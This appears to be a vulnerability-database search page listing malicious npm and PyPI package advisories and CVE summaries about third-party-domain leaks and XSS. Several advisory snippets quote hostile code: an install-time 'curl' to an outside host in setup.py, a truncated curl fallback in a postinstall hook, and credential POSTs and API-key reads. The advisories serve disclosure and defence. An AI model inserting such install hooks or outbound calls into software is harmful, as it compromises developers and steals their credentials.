Lucene search
K

26 matches found

OSV
OSV
added 2026/05/26 2:20 p.m.11 views

MAL-2026-4819 Malicious code in token-me-uk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2a058b653e7a491fdf0c9128b4d2d408c2cdac6a1784adc5f02a0975a0e669eb The CLI in cli.mjs reads its API key from process.env.TOKENMEUKAPIKEY, falling back to process.env.OPENAIAPIKEY and then process.env.ANTHROPICAPIKEY...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/26 1:7 p.m.15 views

Malicious code in baidubsrc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

6AI score
Exploits0References2
OSV
OSV
added 2026/05/26 1:7 p.m.8 views

MAL-2026-4809 Malicious code in baidubsrc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

6AI score
Exploits0References2
OSV
OSV
added 2026/05/25 5:27 a.m.11 views

MAL-2026-4754 Malicious code in heims (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57 The package's WechatUtil.gettoken in src/heims/utils/wechat/wechatutil.py hardcodes a POST to https://token.zhangjianpeng.cn/ with md5appid and...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 11:3 p.m.13 views

Malicious code in openprompt-lang (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 24ccd29557423c05fb49b14b0a9a2e1cfbe5a2b69a1276bc76d287edc46f4ec2 On every npm install, openprompt-lang's postinstall hook scripts/postinstall.js:83 executes npm install -g @opencode/cli 2/dev/null || curl -fsSL...

5.3AI score
Exploits0References11
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 6:33 p.m.12 views

Malicious code in cb-wallet-http (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e8d704c0a6a48da0e2fef8eddcd1f98e7d380c3e19f22753f3df51d9893f60ce Package name mimics Coinbase's internal cb-wallet- namespace to capture dependency-confusion resolutions. On npm install postinstall.js and on...

5.8AI score
Exploits0References1
CVE
CVE
added 2025/12/18 7:53 p.m.7 views

CVE-2019-25228

Kentico Xperience contains an information-disclosure vulnerability where virtual context URLs can be leaked to external domains via the HTTP Referer header during page-builder interactions and loading of links/images. Affected is Kentico Xperience (per CVE-2019-25228 and related records) with ref...

5.3CVSS5.9AI score0.0025EPSS
Exploits0References2Affected Software1
RedhatCVE
RedhatCVE
added 2025/05/22 10:41 p.m.7 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

5.4CVSS6.8AI score0.0038EPSS
Exploits0References1
OSV
OSV
added 2023/07/31 3:15 p.m.37 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting XSS vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitra...

6.1CVSS6AI score0.00615EPSS
Exploits1References2
NVD
NVD
added 2023/07/31 3:15 p.m.44 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting XSS vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitra...

6.1CVSS6AI score0.00615EPSS
Exploits1References2
Vulnrichment
Vulnrichment
added 2023/07/31 12:0 a.m.17 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting XSS vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitra...

6AI score0.00615EPSS
Exploits1References2
Cvelist
Cvelist
added 2023/07/31 12:0 a.m.48 views

CVE-2023-38308

An issue was discovered in Webmin 2.021. A Cross-Site Scripting XSS vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitra...

6.1AI score0.00615EPSS
Exploits1References2
RedHat Linux
RedHat Linux
added 2023/04/12 3:4 p.m.1 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

8.8CVSS7.2AI score0.01646EPSS
Exploits1References5
RedHat Linux
RedHat Linux
added 2023/02/06 7:42 p.m.5 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

8.8CVSS7.2AI score0.01646EPSS
Exploits1References5
RedHat Linux
RedHat Linux
added 2023/01/09 2:55 p.m.2 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

8.8CVSS7.2AI score0.01646EPSS
Exploits1References5
RedHat Linux
RedHat Linux
added 2022/11/17 1:40 p.m.2 views

node-fetch: exposure of sensitive information to an unauthorized actor

A flaw was found in node-fetch. When following a redirect to a third-party domain, node-fetch was forwarding sensitive headers such as "Authorization," "WWW-Authenticate," and "Cookie" to potentially untrusted targets. This flaw leads to the exposure of sensitive information to an unauthorized...

8.8CVSS7.2AI score0.01646EPSS
Exploits1References5
OSV
OSV
added 2022/04/05 6:15 p.m.4 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

5.4CVSS5.8AI score0.0038EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2022/04/05 6:15 p.m.2 views

CVE-2022-28649

In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description...

5.4CVSS6.1AI score0.0038EPSS
Exploits0References2Affected Software1
Prion
Prion
added 2022/03/01 9:15 p.m.11 views

Design/Logic Flaw

Fluture-Node is a FP-style HTTP and streaming utils for Node based on Fluture. Using followRedirects or followRedirectsWith with any of the redirection strategies built into fluture-node 4.0.0 or 4.0.1, paired with a request that includes confidential headers such as Authorization or Cookie,...

5.8CVSS6.2AI score0.00815EPSS
Exploits0References4Affected Software1
IBM Security Bulletins
IBM Security Bulletins
added 2022/02/15 2:55 p.m.21 views

Security Bulletin: IBM InfoSphere Information Server is vulnerable to insecure third party domain access (CVE-2021-29875)

Summary An insecure third party domain access vulnerability in IBM InfoSphere Information Server was addressed. Vulnerability Details CVEID: CVE-2021-29875 DESCRIPTION: IBM InfoSphere Information Server could allow an attacker to obtain sensitive information due to a insecure third party domain...

7.5CVSS6.7AI score0.01109EPSS
Exploits0Affected Software1
Rows per page
Query Builder